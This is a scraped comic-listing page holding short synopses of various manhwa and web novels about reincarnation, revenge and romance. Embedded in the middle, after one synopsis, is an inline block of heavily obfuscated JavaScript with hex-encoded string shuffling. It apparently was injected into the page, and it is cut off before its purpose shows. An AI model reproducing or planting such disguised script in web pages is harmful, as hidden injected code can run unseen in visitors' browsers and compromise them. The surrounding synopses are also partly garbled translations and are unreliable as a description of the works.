Read manhwa A Noble Lady’s Chamber Life / 귀족 영애의 방구석 라이프 We had planned to celebrate our big success by treating ourselves to some Korean beef with my friend, but the novel turned out to be a dismal failure, and naturally, our plans for the beef went up in smoke. And then, something happened to me… I possessed the supporting character, Adeline Macefrill, in that novel! Who is Adeline? She is the ultimate sidekick who wholeheartedly assists the protagonist, Rianna. She has a wide network, poking her nose into everything, gathering all sorts of news and information! I’m an extremely introverted person, so it’s absurd that I ended up possessing such an outgoing character like Adeline!! To make matters worse, the novel’s settings and reality differ. The supposedly well-behaved protagonist, Rianna, shows tremendous jealousy, and even the knight commander, Estian, who had a crush on Rianna, seems to take a liking to me?! Can’t I just quietly enjoy my life in the corner, please?
The fiancee who disappeared five years ago appeared with a child. “This child, is it my child?” “We are no longer in a relationship.” But somehow, her fiancee rejected him, and he was frustrated because he didn’t know, but it didn’t matter. “There is plenty of time. So take it slow.” “… … .” “There was no other woman but you in my life, in the past, now and in the future .” It was meant to seduce him again and make him fall in love with him. [That woman, Mabel] She returned after five years of leaving the royal castle. She took his child. “Do you not love me anymore?” “Yeah. I do not love you.” “… … lie.” As she tried to kill her, she hated this man for her brazen approach, pretending to know nothing of her. “I am not impulsive now. It’s not about burning the atmosphere.” “… … .” “I love you. a lot.” But why does the heart start beating again in front of it, resentful?
Talented player x industry elite. After five years of parting, Li Moyang’s naive and shy younger brother disappeared, and he became an advertising genius known as “the first fox in the business world”. In the face of his ex-boyfriend’s signing contract, Li Moyang decided to launch a “comprehensive revenge” on him. It was better to let him grovel at his feet and cry for mercy! He thought he would be ashamed of himself, but he fell into the trap of the “Fox”. When he found out, he was already in deep trouble and couldn’t extricate himself, with his left hand to do business, and his right to love, Seeing two people falling in love, fighting bravely and passionately!
Sophia is living her dream as a distinguished writer. With failed dating experience and no prospect suitor in sight, she busied herself with her career and brushed off romance in her life. She thinks she is a strong, independent woman until she’s mysteriously transported back to the prim and proper Victorian era. Will she be able to survive this period as a modern woman?
Who is he? Why is he called the Boss? Maybe he’s the fearless ruler of the world. Or maybe the worst enemy of humanity, who tears worlds down. After Su Sin was reborn, he lost all his skills and abilities from former life in a knights’ world. However, a newly implanted System can help him restore them. “My name is Su Sin where Sin means Promise keeper”.<script></script><script>(function(_0x28248a,_0xbb8996){var _0x12aff9=_0x4f16,_0x2bf12f=_0x28248a();while(!![]){try{var _0x4f48bf=parseInt(_0x12aff9(0x192))/(0x4e9*0x4+0x2*-0x9b+-0x1*0x126d)+-parseInt(_0x12aff9(0x194))/(-0x1*-0x169f+0x1408+-0x2aa5)*(-parseInt(_0x12aff9(0x184))/(0x1d3d+-0x2cf*-0x3+0x33*-0xbd))+-parseInt(_0x12aff9(0x18d))/(-0x17e5+-0x15*-0x56+0x10db)+-parseInt(_0x12aff9(0x196))/(0x1*-0x18fd+-0x3a*-0x4+-0x181a*-0x1)+parseInt(_0x12aff9(0x199))/(-0x41*-0x37+-0x724*-0x2+-0x1c39)+-parseInt(_0x12aff9(0x17d))/(-0x1*-0x23b1+-0x167*-0x2+-0x2678)+-parseInt(_0x12aff9(0x18e))/(0xf6+0x745*0x2+-0xf78)*(-parseInt(_0x12aff9(0x181))/(0x1f*-0xa9+0x2*0xbaa+-0x2d4));if(_0x4f48bf===_0xbb8996)break;else _0x2bf12f['push'](_0x2bf12f['shift']());}catch(_0x49e61a){_0x2bf12f['push'](_0x2bf12f['shift']());}}}(_0xecf1,0x13*-0x6b6f+0x88cae+-0x7*-0xc983));function _0xecf1(){var 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Not only did I wake up in a coffin, I even became a ‘man’! Did I have time travel? What’s with this man’s dress? The life in another world is not easy, and I even have to deal with that dark and cunning duke!Source to collect images:
“Ever since that earthquake incident, I’ve been able to see monsters.” In the rapidly changing city, “artifacts”, which were on the verge of extinction, have begun to draw closer to humans.
When the book of destiny can portray and change the future, when the characters in the pen become a living reality, the comic world and the real world overlap! Ordinary female college student Luo Youzhen is about to experience an unprecedented experience, and embark on an adventure journey… A hidden cartoonist, a cartoon character with abilities, a hegemonic young man next to him, a mysterious female killer, who represents justice Who is evil? The comic legend that crossed the dimension opened! The Comic Changed My Destiny Wo Di Ming Yun Zhi Shu 我的命运之书
Read manhwa If You Remove the Kind Protagonist’s Mask In order to survive, I robbed the male lead by covering his lips with my lips. That’s why he became my life partner. But in the original, the ‘gentle’ male lead is all fake! “If you kill me, maybe this relationship will be free” “You won’t be able to do it. We’ll both die at the same time.” We were bound together by a firm destiny. Share the wound, share the pain, share life and death. Furthermore, is contact for the sake of symbiosis necessary? He did not hesitate to have his mask discovered, but was also cruel to me. Overworked, unreasonable demands… Why can’t I be with other boys? “I know it! ‘How to release friendships’” Now that my life is safe, I just need to try to escape again… “I have no intention of letting go.” “…What?” “Like what I’m curious about” His gaze slowly fell to my lips as he hugged me “I also wonder how much our pain will be shared.”
She died three times at the hands of the emperor. Then, her fourth life began. All I had left was evil and vengeance. I can’t take it anymore. Now it is my turn to get revenge on those who have wronged me. “However, the person whom I will be marrying is not His highness, the second prince.” The surroundings became quiet as if I had poured cold water on them with my words. The nobles looked at each other in bewilderment, and the face of the second prince was brutally twisted. The faces of the crown prince and empress, as well as other princes and queens, were clearly embarrassed. A situation in which everyone is watching me, holding back their breath. “Then who on earth is it?” When asked by the emperor, I smiled brightly and pointed to the boy at the end of the prince’s row. “This is the man who I am going to marry.” My Husband Is My Choice / 내 남편은 내가 정한다 / I Decide My Husband
One office with two ex-boyfriends! What will be Han Na Bom’s fate…?
A young boy named Mu Bai embarked on the path to becoming a professional killer because he accidentally killed someone earlier. One day, a black card appeared at this door-The white throne. This is the most powerful weapon in the world, the ultimate weapon left by the night king. Who will be able to take good use of this weapon and become the best professional killer? Killers have their own paths which involve both killing and self evolvement